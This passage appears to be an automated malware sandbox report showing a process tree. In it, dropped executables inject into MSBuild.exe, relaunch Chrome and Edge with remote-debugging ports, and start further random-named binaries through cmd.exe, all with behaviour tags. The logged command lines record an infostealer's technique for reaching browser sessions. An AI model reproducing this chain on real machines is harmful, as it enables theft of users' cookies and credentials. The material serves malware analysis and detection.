        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:384
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4016
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5856
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe4347dcf8,0x7ffe4347dd04,0x7ffe4347dd10
        11⤵
        
        PID:6132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1952 /prefetch:2
        11⤵
        
        PID:1676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2240 /prefetch:3
        11⤵
        
        PID:1964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2444 /prefetch:8
        11⤵
        
        PID:3140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3136 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:2040
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2580,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3356 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3984,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4048 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:3104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4608,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4584 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5208 /prefetch:8
        11⤵
        
        PID:4584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5308 /prefetch:8
        11⤵
        
        PID:3480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5212 /prefetch:8
        11⤵
        
        PID:3232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3704,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5700 /prefetch:8
        11⤵
        
        PID:3248
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5864 /prefetch:8
        11⤵
        
        PID:2528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5856 /prefetch:8
        11⤵
        
        PID:4076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:5612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2a4,0x7ffe4345f208,0x7ffe4345f214,0x7ffe4345f220
        11⤵
        
        PID:116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1980,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:2
        11⤵
        
        PID:5784
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=2020 /prefetch:3
        11⤵
        
        PID:2732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1424,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=2704 /prefetch:8
        11⤵
        
        PID:6036
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:544
        
        C:\ProgramData\knyukx4ect.exe
        
        "C:\ProgramData\knyukx4ect.exe"
        10⤵
        
        PID:6948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:6980
        
        C:\ProgramData\wb1n79r9hd.exe
        
        "C:\ProgramData\wb1n79r9hd.exe"
        10⤵
        
        PID:6228
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:6224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:25076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe4482dcf8,0x7ffe4482dd04,0x7ffe4482dd10
        13⤵
        
        PID:25100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2460,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:2
        13⤵
        
        PID:25508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2488 /prefetch:3
        13⤵
        
        PID:25516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2088,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:8
        13⤵
        
        PID:25552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=3284 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:25580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=3304 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:25588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:2
        13⤵
        Uses browser remote debugging
        
        PID:20156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:25268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=5044 /prefetch:8
        13⤵
        
        PID:4596
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:25644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        13⤵
        Uses browser remote debugging
        
        PID:25748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffe44c3f208,0x7ffe44c3f214,0x7ffe44c3f220
        14⤵
        
        PID:26104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:3
        14⤵
        
        PID:26412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2568,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:2
        14⤵
        
        PID:24572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2172,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2940 /prefetch:8
        14⤵
        
        PID:860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:25716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:25732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:8
        14⤵
        
        PID:26116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4904,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:8
        14⤵
        
        PID:24988
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\GCFCFCGCGI.exe"
        12⤵
        
        PID:11996
        
        C:\Users\Admin\GCFCFCGCGI.exe
        
        "C:\Users\Admin\GCFCFCGCGI.exe"
        13⤵
        
        PID:11080
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:11008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        15⤵
        Uses browser remote debugging
        
        PID:19948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe5472dcf8,0x7ffe5472dd04,0x7ffe5472dd10
        16⤵
        
        PID:20696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=1984 /prefetch:2
        16⤵
        
        PID:22404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2144,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:3
        16⤵
        
        PID:6460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2276,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:8
        16⤵
        
        PID:23308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=3300 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:23072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=3320 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:22892
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:2
        16⤵
        Uses browser remote debugging
        
        PID:18316
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:23108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4808,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4928 /prefetch:8
        16⤵
        
        PID:10236
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IIJEBFCFIJ.exe"
        12⤵
        
        PID:11088
        
        C:\Users\Admin\IIJEBFCFIJ.exe
        
        "C:\Users\Admin\IIJEBFCFIJ.exe"
        13⤵
        
        PID:10756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:10712
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\BKJKJEHJJD.exe"
        12⤵
        
        PID:9664
        
        C:\Users\Admin\BKJKJEHJJD.exe
        
        "C:\Users\Admin\BKJKJEHJJD.exe"
        13⤵
        
        PID:10396
        
        C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bbE3GYiwqAzDhysT.exe
        
        C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bbE3GYiwqAzDhysT.exe 0
        14⤵
        
        PID:10376
        
        C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bfwPSGVrNnP06fHt.exe
        
        C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bfwPSGVrNnP06fHt.exe 10376
        15⤵
        
        PID:10320
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10320 -s 632
        16⤵
        Program crash
        
        PID:24396
        
        C:\Windows\SysWOW64\WerFault.exe
        
